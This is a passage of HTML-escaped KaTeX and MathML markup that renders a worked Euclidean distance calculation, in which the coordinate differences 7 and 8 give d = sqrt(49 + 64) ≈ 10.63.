scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;msup&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;msup&gt;&lt;mn&gt;8&lt;/mn&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mrow&gt;&lt;/mrow&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;64&lt;/mn&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;msqrt&gt;&lt;mrow&gt;&lt;mn&gt;49&lt;/mn&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mn&gt;64&lt;/mn&gt;&lt;/mrow&gt;&lt;/msqrt&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mrow&gt;&lt;/mrow&gt;&lt;mo&gt;≈&lt;/mo&gt;&lt;mn&gt;10.63&lt;/mn&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mrow&gt;&lt;/mrow&gt;&lt;mo&gt;≈&lt;/mo&gt;&lt;mn&gt;10.63&lt;/mn&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;/mtable&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;&#92;begin{aligned}
q_1 - p_1 = 3 - (-4) &amp;amp;= 7 &#92;&#92;
q_2 - p_2 = 4 - (-4) &amp;amp;= 8 &#92;&#92;
(q_1 - p_1)^2 = 7^2 &amp;amp;= 49 &#92;&#92;
(q_2 - p_2)^2 = 8^2 &amp;amp;= 64 &#92;&#92;
&#92;sqrt{49 + 64} &amp;amp;&#92;approx 10.63 &#92;&#92;
d &amp;amp;&#92;approx 10.63
&#92;end{aligned}
&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:9.122646000000003em;vertical-align:-4.311323000000002em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mtable&quot;&gt;&lt;span class=&quot;col-align-r&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:4.811323000000001em;&quot;&gt;&lt;span style=&quot;top:-6.971323000000001em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.03588em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:0em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-5.471323em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.03588em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:0em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-3.947215em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.03588em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:0em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;7&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-2.4231070000000003em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.03588em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:0em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;8&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-0.8486769999999999em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord sqrt&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.9144300000000001em;&quot;&gt;&lt;span class=&quot;svg-align&quot; style=&quot;top:-3em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot; style=&quot;padding-left:0.833em;&quot;&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;9&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;6&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-2.8744300000000003em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;hide-tail&quot; style=&quot;min-width:0.853em;height:1.08em;&quot;&gt;&lt;svg width=&quot;400em&quot; height=&quot;1.08em&quot; viewBox=&quot;0 0 400000 1080&quot; preserveAspectRatio=&quot;xMinYMin slice&quot;&gt;&lt;path d=&quot;M95,702
c-2.7,0,-7.17,-2.7,-13.5,-8c-5.8,-5.3,-9.5,-10,-9.5,-14
c0,-2,0.3,-3.3,1,-4c1.3,-2.7,23.83,-20.7,67.5,-54
c44.2,-33.3,65.8,-50.3,66.5,-51c1.3,-1.3,3,-2,5,-2c4.7,0,8.7,3.3,12,10
s173,378,173,378c0.7,0,35.3,-71,104,-213c68.7,-142,137.5,-285,206.5,-429
c69,-144,104.5,-217.7,106.5,-221
l0 -0
c5.3,-9.3,12,-14,20,-14
H400000v40H845.2724
s-225.272,467,-225.272,467s-235,486,-235,486c-2.7,4.7,-9,7,-19,7
c-6,0,-10,-1,-12,-3s-194,-422,-194,-422s-65,47,-65,47z
M834 80h400000v40h-400000z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.12556999999999996em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:0.6513230000000014em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;d&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:4.311323000000002em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;col-align-l&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:4.811323000000001em;&quot;&gt;&lt;span style=&quot;top:-6.971323000000001em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;7&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-5.471323em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;8&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-3.947215em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;9&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-2.4231070000000003em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;6&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-0.8486769999999999em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;≈&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;6&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:0.6513230000000014em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;≈&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;6&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:4.311323000000002em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
